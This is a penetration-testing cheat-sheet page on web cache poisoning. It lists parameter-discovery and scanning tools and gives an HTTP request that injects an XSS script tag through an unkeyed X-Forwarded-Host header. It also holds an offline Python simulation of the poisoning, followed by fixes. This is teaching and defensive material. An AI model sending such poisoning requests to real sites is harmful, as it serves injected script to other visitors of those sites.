Pentest Book
Web Cache Poisoning

General

Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.
Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.
A poisoned web cache can potentially be a devastating means of distributing numerous different attacks, exploiting vulnerabilities such as XSS, JavaScript injection, open redirection, and so on.

Tools

```bash
# https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
wcvs -u https://url.com
# https://github.com/s0md3v/Arjun
python3 arjun.py -u https://url.com --get
python3 arjun.py -u https://url.com --post
# https://github.com/maK-/parameth
python parameth.py -u https://example.com/test.php
# https://github.com/devanshbatham/ParamSpider
python3 paramspider.py --domain example.com
# https://github.com/s0md3v/Parth
python3 parth.py -t example.com
```
```http
# XSS for users accessing /en?region=uk:
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
```
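The two phases described under General, applied to the X-Forwarded-Host request above, as an added offline simulation (not part of the original page or of any listed tool): a toy cache whose key omits the header, a toy origin that reflects it, and two fixes. The names `backend`, `Cache`, `ALLOWED_HOSTS` and the reflected meta tag are assumptions made for illustration.

```python
import html

ALLOWED_HOSTS = {"innocent-website.com"}  # assumption: the only valid public host


def backend(headers, harden=False):
    """Toy origin that builds an absolute URL from X-Forwarded-Host."""
    host = headers.get("X-Forwarded-Host", headers["Host"])
    if harden:
        # Fix 1: ignore forwarded hosts that are not on the allowlist.
        if host not in ALLOWED_HOSTS:
            host = headers["Host"]
        # Fix 2: encode on output regardless of where the value came from.
        host = html.escape(host, quote=True)
    return f'<meta property="og:image" content="https://{host}/logo.png">'


class Cache:
    """Toy cache keyed on Host + path/query, plus any headers listed in `vary`."""

    def __init__(self, vary=()):
        self.store = {}
        self.vary = tuple(vary)

    def key(self, path, headers):
        return (headers["Host"], path) + tuple(headers.get(h, "") for h in self.vary)

    def fetch(self, path, headers, harden=False):
        k = self.key(path, headers)
        if k not in self.store:  # cache miss: ask the origin and store the answer
            self.store[k] = backend(headers, harden)
        return self.store[k]


def victim_sees_injected(cache, harden=False):
    """Replay the page's request, then fetch the same URL as an ordinary visitor."""
    injected = 'a."><script>alert(1)</script>"'  # header value from the page
    base = {"Host": "innocent-website.com"}
    cache.fetch("/en?region=uk", {**base, "X-Forwarded-Host": injected}, harden)
    body = cache.fetch("/en?region=uk", base, harden)  # no special headers
    return "<script>" in body


if __name__ == "__main__":
    print("header unkeyed, origin reflects it:", victim_sees_injected(Cache()))
    print("header added to the cache key:", victim_sees_injected(Cache(vary=("X-Forwarded-Host",))))
    print("origin validates and encodes:", victim_sees_injected(Cache(), harden=True))
```

Adding the header to the cache key only isolates the poisoned entry to requests that send the same header value; validating and encoding at the origin removes the reflection itself.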